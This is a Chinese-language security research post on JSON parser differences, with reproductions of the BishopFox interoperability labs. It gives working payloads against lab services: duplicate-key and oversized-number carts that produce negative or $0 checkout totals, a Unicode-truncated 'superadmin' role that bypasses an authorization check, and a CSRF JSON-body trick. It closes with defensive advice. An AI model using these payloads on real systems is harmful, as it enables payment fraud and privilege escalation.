JSON解析差异-风险研究
简介
这篇文章中,分享一个技巧。通过json解析差异可能存在的安全风险
需要的前提: 多组件JSON解析存在差异
从json开始
JSON(JavaScript Object Notation)是一种轻量级的数据交换格式,易于人类阅读和编写,同时也易于机器解析和生成。它广泛用于数据传输,尤其是在客户端与服务器之间的数据交换。
源自JavaScript语言,但随着时间的推移,已发展成为众多编程语言支持的通用数据格式标准。
一个示例
{
"name": "John Doe",
"age": 30,
"isEmployee": true,
"address": {
"street": "123 Main St",
"city": "New York",
"zipcode": "10001"
},
"phoneNumbers": ["123-456-7890", "987-654-3210"]
}
JSON解析安全问题
在正式开始之前,先说两个结论
- 相同的 JSON 文档可以跨微服务解析为不同的值,从而导致各种潜在的安全风险
- 正是因为第一点,JSON解释器越多,那么潜在得安全问题越多
问题来源
想必任何问题都是这样,无规矩不成方圆,正是因为没有对JSON格式化进行强定义的规范导致JSON解析差异引发安全问题
官方 JSON RFC 中,也对一些细节提供了宽泛的规则,例如如何处理重复键和表示数字。尽管本指南后面有关于解析差异的免责声明,但大多数 JSON 解析器的用户并未关注这些注意事项
并且除了官方的RFC规范,还有很多不同解析器的不同规范,列举如下
- IETF JSON RFC (8259 and prior): official Internet Engineering Task Force (IETF) specification.
- ECMAScript Standard: Changes to JSON are released in lockstep with RFC releases, and the standard refers to the RFC for guidance on JSON. However, non-spec conveniences provided by the JavaScript interpreter, such as quoteless strings and comments, have inspired many parsers.
- JSON5: This superset specification augments the official specification by explicitly adding convenience features (e.g., comments, alternative quotes, quoteless strings, trailing commas).
- HJSON: HJSON is similar to JSON5 in spirit with different design choices.
- 等等...
重复键的处理(优先级问题)
obj = {"a": 1, "a": 2}
如上:a的值到底是1还是2?
来看下IETF JSON RFC (8259)的解释https://datatracker.ietf.org/doc/html/rfc8259
官方解释了这块:简单理解意思就是并无明确规定
问题复现:https://github.com/BishopFox/json-interop-vuln-labs/tree/master/lab1
这里我们采用这个实验进行问题分析
- 启动容器
docker-compose up -d
- python flask jsonschema 处理
import jsonschema
import requests
import json
test_json = {
"orderId": 10,
"cart": [
{
"id": 0,
"qty": 5
},
{
"id": 1,
"qty": -1,
"qty": 1
}
]
}
test_json2 = {
"orderId": 10,
"cart": [
{
"id": 0,
"qty": 5
},
{
"id": -10,
"qty": 1
}
]
}
schema = {
"type": "object",
"properties": {
"orderId": {
"type": "number",
"maximum": 10,
},
"cart": {
"type": "array",
"items": {
"type": "object",
"properties": {
"id": {
"type": "number",
"minimum": 0,
"exclusiveMaximum": 9 #len(productDB)-1
},
"qty": {
"type": "integer",
"minimum": 1
},
},
"required": ["id", "qty"],
}
}
},
"required": ["orderId", "cart"],
}
res = jsonschema.validate(instance=test_json, schema=schema)
print(res)
print(test_json)
res2 = jsonschema.validate(instance=test_json2, schema=schema)
print(res2)
print(test_json2)
- 可见python处理的方式为,已重复的第二个键为主
- golang的处理
package main
import (
"fmt"
"github.com/buger/jsonparser"
)
func main() {
jsonData := []byte(`{
"orderId": 10,
"cart": [
{
"id": 0,
"qty": 5
},
{
"id": 1,
"qty": -1,
"qty": 1
}
]
}`)
// fmt.Println("data:", jsonData)
jsonparser.ArrayEach(
jsonData,
func(value []byte, dataType jsonparser.ValueType, offset int, err error) {
id, _ := jsonparser.GetInt(value, "id")
qty, _ := jsonparser.GetInt(value, "qty")
fmt.Println("id:", id)
fmt.Println("qty:", qty)
},
"cart")
}
可见go jsonparser处理的方式为,已重复的第一个键为主
lab1的wp也就是利用的这一点,python的flask服务作为代理校验层,而真正的计算逻辑在go
curl 192.168.56.130:5000/cart/checkout -H "Content-Type: application/json" -d @lab1_req.json
# lab1_req.json
{
"orderId": 10,
"cart": [
{
"id": 0,
"qty": 5
},
{
"id": 1,
"qty": -1,
"qty": 1
}
]
}
- 100*5-200 = 300
字符截断&注释(优先级问题)
可以通过字符截断和注释引发解析冲突问题,从而增加受重复键优先级影响的解析器数量。
字符截断
当特定字符出现在字符串中时,某些json解析lib会截断,而一些解析器则不会。可能会导致不同的键被解释为重复项
比如如下payload
{"test": 1, "test\[raw \x0d byte]": 2}
{"test": 1, "test\ud800": 2}
{"test": 1, "test"": 2}
{"test": 1, "te\st": 2}
- python2.X 对unicode编码解码行为
import json
import ujson
# Serialization into illegal unicode.
u"asdf\ud800".encode("utf-8")
# Reserializing illegal unicode
json.dumps({"test": "asdf\xed\xa0\x80"})
# 三方工具 ujson处理 重复key
ujson.loads('{"test": 1, "test\\ud800": 2}')
- python3.X 对unicode编码解码行为
总结可见,python2 对此类情况存在绕过的可能
lab2 复现
https://github.com/BishopFox/json-interop-vuln-labs/tree/master/lab2
- 创建admin用户/user/create,正常业务逻辑
{
"user": "adminUser",
"roles": ["superadmin"]
}
- 创建普通角色成功
{"name": "simple"}
superadmin\ud888
unicode解析绕过
[root@localhost lab2]# cat role2.json
{"name": "superadmin\ud888"}
- 创建exampleuser 权限为
superadmin\ud888
[root@localhost lab2]# curl localhost:5002/user/create -H "Content-Type: application/json" -d @user2.json
{"OK":"Created user 'exampleUser'"}
[root@localhost lab2]# cat user2.json
{
"user": "exampleUser",
"roles": ["superadmin\ud888"]
}
- 验证
注释截断
这块引用整理如下:
obj = {"description": "Duplicate with comments", "test": 2, "extra": /*, "test": 1, "extra2": */}
不同json sdk解析结果如下
- GoLang's GoJay library
description = "Duplicate with comments"
test = 2
extra = ""
- Java's JSON-iterator library
description = "Duplicate with comments"
extra = "/*"
extra2 = "*/"
test = 1
obj = {"description": "Comment support", "test": 1, "extra": "a"/*, "test": 2, "extra2": "b"*/}
不同json sdk解析结果如下
- Java’s GSON library
{"description":"Comment support","test":1,"extra":"a"}
- Ruby’s simdjson library
{"description":"Comment support","test":2,"extra":"a","extra2":"b"}
JSON序列化风险
json序列化过程同样需要注重重复键的问题,举例如下
# Java's JSON-iterator
# input
obj = {"test": 1, "test": 2}
# output
obj["test"] // 1
obj.toString() // {"test": 2}
# C++’s rapidjson
# input
obj = {"test": 1, "test": 2}
# output
obj["test"] // 2
obj.toString() // {"test": 1, "test": 2}
int float类型 json解析
首先看下官方的解释,RFC中明确提出这块解析会有潜在的不一致问题
大数问题
# input
999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999
# 可能的output
999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999
9.999999999999999e95
1E+96
0
9223372036854775807
eg:
- python3 demo
[root@localhost json-interop-vuln-labs_test]# python3 python_json.py
/usr/local/lib/python3.8/site-packages/urllib3/__init__.py:35: NotOpenSSLWarning: urllib3 v2 only supports OpenSSL 1.1.1+, currently the 'ssl' module is compiled with 'LibreSSL 3.9.0'. See: https://github.com/urllib3/urllib3/issues/3020
warnings.warn(
None
{'orderId': 10, 'cart': [{'id': 0, 'qty': 5}, {'id': 1, 'qty': 999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999}]}
python3对 大数处理正常
- go demo
jsonData := []byte(`{
"orderId": 10,
"cart": [
{
"id": 0,
"qty": 5
},
{
"id": 1,
"qty": 999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999
}
]
}`)
GO 处理大数字 解析后为 0
- lab1的第二种解法
[root@localhost lab1]# cat lab1_alt_req.json
{
"orderId": 10,
"cart": [
{
"id": 8,
"qty": 999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999
}
]
}
curl 192.168.56.130:5000/cart/checkout -H "Content-Type: application/json" -d @lab1_alt_req.json
>>>
[root@localhost lab1]# curl 192.168.56.130:5000/cart/checkout -H "Content-Type: application/json" -d @lab1_alt_req.json
Receipt:
999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999x $100 E-Gift Card @ $100/unit
Total Charged: $0
- 最后一种特殊case,大数到无穷大
RFC定义:Positive and negative infinity along with NaN (not a number) are not supported by the official RFC
同样RFC并没有进行强制规定,那么可能的case如下
{"description":"Big float","test":1.0e4096}
{"description":"Big float","test":Infinity}
{"description":"Big float","test":"+Infinity"}
{"description":"Big float","test":null}
{"description":"Big float","test":Inf}
{"description":"Big float","test":3.0e14159265358979323846}
{"description":"Big float","test":9.218868437227405E+18}
# php demo
<b><?php</b>
echo 0 == 1.0e4096 ? "True": "False" . "\n"; # False
echo 0 == "Infinity" ? "True": "False" . "\n"; # True
<b>?></b>
宽松的JSON序列化
总结来说,一些json解析器会严格执行RFC语法。同样其他的解析器允许出现一些"奇怪"字符
- CSRF攻击中
POST /update_XXX HTTP/1.1
...
Content-Type: application/x-www-form-urlencoded
{"testlaitie233": 1}=
一些payload之所以能够执行也是因为这个原因
这部分可以进行fuzz测试
防御
这部分要分为json sdk开发 普通使用开发者两个维度
- json sdk开发: 严格按照RFC定义规范,并处理本文介绍的异常case
- 普通开发者(使用方):盘点整个架构中现有的解析器,对异常情况进行jsonscheme强校验
写在最后
本文介绍了一种json解析导致的潜在安全问题,在真实的环境,需要多多分析各json解释器的差异和相同点
历史上也有很多CVE的原理如此
参考
https://bishopfox.com/blog/json-interoperability-vulnerabilities